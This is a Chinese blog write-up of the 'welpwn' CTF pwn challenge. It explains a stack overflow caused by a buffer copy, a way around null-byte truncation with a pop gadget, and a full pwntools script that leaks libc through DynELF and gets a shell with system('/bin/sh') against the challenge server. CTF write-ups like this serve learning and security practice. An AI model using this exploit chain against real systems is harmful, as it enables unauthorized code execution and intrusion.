ADworld pwn wp - welpwn

最新推荐文章于 2024-05-09 09:32:40 发布
最新推荐文章于 2024-05-09 09:32:40 发布
阅读量135 收藏
点赞数
分类专栏: PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33976344/article/details/118215883
版权

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

输入没有溢出, 但是复制过程出现了溢出点, 0x400复制到0x10中, 所以可以溢出echo函数, 劫持到ROP泄露puts地址, 找到libc版本, 然后ret2libc. 不过尝试之后发现行不通, 因为复制过程遇到截断符’\0’会停止, 所以直接ROP链会复制不完全, pop_rdi_addr本身就包含了’\0’, 所以可以平衡栈后执行ROP, 这里不一定是在复制完返回地址之后马上截断, 但是8字节地址中包含’\0’, 所以一定会截断, 这里覆盖到的地址是buf的前8个字节, 对ROP没影响, 所以理论可行
在这里插入图片描述
栈帧结构
在这里插入图片描述
所以需要pop_4_addr, 弹出buf的前4 * 8个字节, 后面接ROP就可以正常运行
这里构造ROP需要特殊的片段, 也考验攻击者的构造能力

在这里插入图片描述

在这里插入图片描述

设置

rbx = 0
rbp = 1
r12 = write_got
r13 = rdx = write的第三个参数 = 8
r14 = rsi = write的第二个参数 = leak_addr
r15 = rdi = write的第一个参数 = 1 写出leak的地址

用DynELF泄露地址后, 寻找system地址, 配合写入"/bin/sh"实现get shell
这里需要注意, 执行mov_addr片段后, 会继续执行pop_6_addr片段, 所以需要填充7 * 8 = 56字节的数据, 再劫持会start_addr, 重复运行, 第二次运行时已经有了system地址, 所以只需要write写入"/bin/sh"到elf.bss()段, 再system调用即可

from pwn import *
from pwnlib.util.cyclic import cyclic
from pwnlib.util.misc import write 

URL, PORT = "111.200.241.244", 57464 
sel = 1
io = process("./welpwn") if sel == 0 else remote(URL, PORT)

elf = ELF("./welpwn")
print("success")
start_addr = 0x0000000000400630
read_got = elf.got['read']
write_got = elf.got['write']
pop_4_addr = 0x000000000040089c
pop_6_addr = 0x000000000040089A
pop_rdi_addr = 0x00000000004008a3
mov_addr = 0x0000000000400880
binsh_addr = elf.bss()

def leak(addr):
    print(io.recv(1024))
    payload1 = cyclic(0x18) + p64(pop_4_addr) + p64(pop_6_addr) 
    payload1 += p64(0) + p64(1) + p64(write_got) + p64(8) + p64(addr) + p64(1)
    payload1 += p64(mov_addr) + cyclic(56) + p64(start_addr)
    payload1.ljust(1024, b'z')
    io.send(payload1)
    leak_addr = io.recv(8)
    return leak_addr

dyn = DynELF(leak, elf = ELF("./welpwn"))
sys_addr = dyn.lookup('system', 'libc')
payload2 = cyclic(0x18) + p64(pop_4_addr) + p64(pop_6_addr)
payload2 += p64(0) + p64(1) + p64(read_got) + p64(8) + p64(binsh_addr) + p64(0)
payload2 += p64(mov_addr) + cyclic(56) + p64(pop_rdi_addr) + p64(binsh_addr) + p64(sys_addr) 
payload2.ljust(1024, b'z')
print(io.recv(1024))
io.send(payload2)
io.send("/bin/sh\x00")
io.interactive()

在这里插入图片描述

总结

python3.x使用DynELF, 返回bytes类型就行, 不需要做任何处理

写入时记住read的第一个参数是0, 以标准输入stdin写入

打不通时, 注意检查payload是否少写了pop_rdi_addr设置system的参数

fa1c4
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
welpwn(xctf)
weixin_43868725的博客
06-15 233
0x0 程序保护和流程 保护: 流程: main() echo() echo函数中存在明显的栈溢出漏洞。 0x1 利用过程 使用x64的通用gadget,泄露write函数的地址。使用LibcSearcher查出相应的libc,得到system函数和/bin/sh字符串的地址就可以getshell了。但是理想是丰满的现实是骨感的,exp写完后一直报错。用GDB查看一下core。发现确实覆盖了返回地址但是后面紧接着是输入缓冲区中的数据。回过去看echo函数,发现在写入s2的时候/x00会被截断,这种截断
XCTF-PWN welpwn
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-16 629
使用LibcSearcher解法 使用GDB动态调试下,发现 0x7fffffffdae0-0x7fffffffdb00是函数是echo的栈帧 0x7fffffffdb00开始就是属于main函数的栈帧 0x7fffffffdb00-0x7fffffffdb08是上一个栈帧的rbp,已经被覆盖 0x7fffffffdb08-0x7fffffffdb0f是retn返回的地址 可以通过4个pop把...
pwn-welpwn
醉等佳人归
09-08 255
1.题目 1.保护机制 开启nx 2.关键代码 主函数 echo函数 2.思路 重点1:可以看到栈溢出漏洞,但是echo函数代码显然限制了ROP链中有\x00的出现,但是我们发现echo函数栈非常小,导出我们溢出可以溢出到主函数的buf缓冲区中,而且主函数的buf是不受\x00影响的,所以我们先使用pop覆盖echo函数的返回值,然后在主函数的buf中执行shellcode 重点2:这次试用了LibcSearcher库来完成函数地址泄漏 from pwn import * from ctypes imp
探索黑客艺术:welpwn —— 一键破解的利器
最新发布
gitblog_00009的博客
05-09 316
探索黑客艺术:welpwn —— 一键破解的利器 项目地址:https://gitcode.com/matrix1001/welpwn 在黑客世界中,编程技巧和漏洞利用的艺术并存。今天,我们要向您推荐一款能简化这一过程的强大工具——welpwn。它是一个自动化神器,让您的pwnning技巧如虎添翼。 项目简介 welpwn是为那些追求高效破解的开发者设计的,它的目标是为您处理繁琐的工作,让您专注于...
(攻防世界)(pwnwelpwn
PLpa的博客
07-18 2685
首先,放在最前面:这题服务器远端的libc版本是libc-2.23.so而不是libc-2.19.so的版本(害得我编译半天出不来) 看到题目,我们下载附件,一看是个tar.gz文件,我们解压一下,发现里面有三个文件: 我就心想,这个攻防世界怎么就这么好心这次,以前要给的时候从来不给,这次这么大方???答案是大错特错,这就是个骗局,这个反而是个障碍,版本根本就是错的(但仔细一想,有可能是出题者故...
[攻防世界]-welpwn
m0_55906008的博客
12-05 542
pwn
adworld-wargame:我对https://adworld.xctf.org.cntask上的pwn挑战的利用
02-13
adworld-wargame 我对上的pwn挑战的利用
Adworld2012互联网营销世界大会PPT下载
07-23
教程名称: Adworld2012互联网营销世界大会PPT下载【】APPS新媒体运营及营销探索-岳建雄-搜狐【】体育营销动起来-陈鄂-力美【】品牌广告推动移动营销创新-郭伟-安沃传媒【】基于受众的网络广告交易市场-王岳龙-传漾...
dice_game.zip
06-16
资源为攻防世界上的pwn题目样本,主要就是设计缓冲区溢出,大家也可在攻防世界pwn练习题中获取,地址为https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=1&id=4694&page=1
【XCTF-RE】新手练习区-simple-unpack
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/ld1cw8
Adworld2009互动营销年度盛典English介绍
09-18
Adworld2009互动营销年度盛典English介绍
welpwn pwn 入门题
02-11
pwn 入门题
welpwn::sparkling_heart:CTFpwn框架
02-04
介绍 修剪是一门艺术。 welpwn旨在制作艺术品,使您摆脱数十种毫无意义的工作。 产品特点 自动为您获取那些魔术值。 libc address heap address stack address program address (带有PIE ) canary 支持多glibc调试。 2.19、2.23-2.29 32位和64位 调试增强(支持PIE )。 符号 断点 杂项 libc-database one_gadget 堆? 好吧,不支持堆分析。 但是我有一个给你的礼物。 安装 您有两种使用welpwn 。 通过安装 从0.9.3版本开始已添加setup.py 。
攻防世界高手进阶区 ——Welpwn
weixin_62675330的博客
03-21 816
攻防世界高手进阶区 ——Welpwn 分析文件 checksec分析 coke@ubuntu:~/桌面/CTFworkstation/OADW/welpwn$ checksec welpwn [*] '/home/coke/桌面/CTFworkstation/OADW/welpwn/welpwn' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX e
菜鸟做题记--------welpwn(RCTF2015)
Return的博客
02-12 491
1.看下保护发现只打开了NX。 [*] 'home/ctf/welpwn' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) 2.拖入IDA看下结果 int __cdecl main(int argc, const char **argv, const char **e
攻防世界 welpwn WP
Zarcs_233的博客
01-29 900
这道题出的确实很wel 拿到这题,查看保护 发现shellcode走不通,一般都是走rop路线 IDA打开,分析代码,发现main函数内调用了echo函数 这里的buf有0x400大,但是main不存在栈溢出,继续点开echo 这里我们发现有一个赋值的过程,但是a1也就是buff有0x400,而s2只有0x10字节。 很明显,复制过程中存在栈溢出,但是我一开始没发现这一点,那就是这个赋值的终止...
攻防世界 welpwn
10-07 290
1.题目 2.IDA分析 3.流程分析 流程很简单,输入buf,这里不存在溢出,然后进入echo方法,将buf复制到s2,当遇到\x00就结束。这个条件会导致p64(addr)后面的内容被截断(地址经p64包装后肯定会出现\0x00)。栈结构如下: 也就是说,s2只能复制buf前面32个单元的内容。为了使32位后面的内容得以执行,我们需要在ret位置跳去执行四个pop指令,去掉buf前32位内容(也就是复制到s2里面的这些内容),这样就能连贯执行32位之后的内容了。 所以,..
RCTF 2015 welpwn [ROP] [x64通用gadgets]
ACdream
01-26 778
先checksec一下: 漏洞点其实蛮好找的:程序里也没几个函数 main函数中read了一个字符串,然后当成参数传递给了echo函数 在echo中的函数的接收buffer长度仅仅为0x10,而且是一个一个字符赋值的,栈缓冲区溢出漏洞,0x10 + 0x8 = 0x18个填充 控制了ESP之后,程序开启了NX,一定想到的是ROP 这里的基础知识是: http:/...
welpwn RCTF-2015 攻防世界
qq_41071646的博客
06-03 1629
参考链接 http://www.purpleroc.com/md/2015-11-17@RCTF-Writeup.html 这个题只是没有想到 找到这个点 然后 攻防世界 给的 so库也有问题 感觉 攻防世界的so环境都是 2.23的鸭 然后我就没有用DynELF 其实 可以在服务器看一下 地址 然后根据 后三位来判断是那个 只不过没有 DynELF 方便 思路就是 构造一个 ...
[攻防世界 pwn]——welpwn
Y_peak的博客
02-20 297
[攻防世界 pwn]——welpwn 题目地址: https://adworld.xctf.org.cn/ 题目: 我只能说这道题太巧了, 实在太巧了。我想出来一个名词叫做栈连接 还是先checksec一下

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值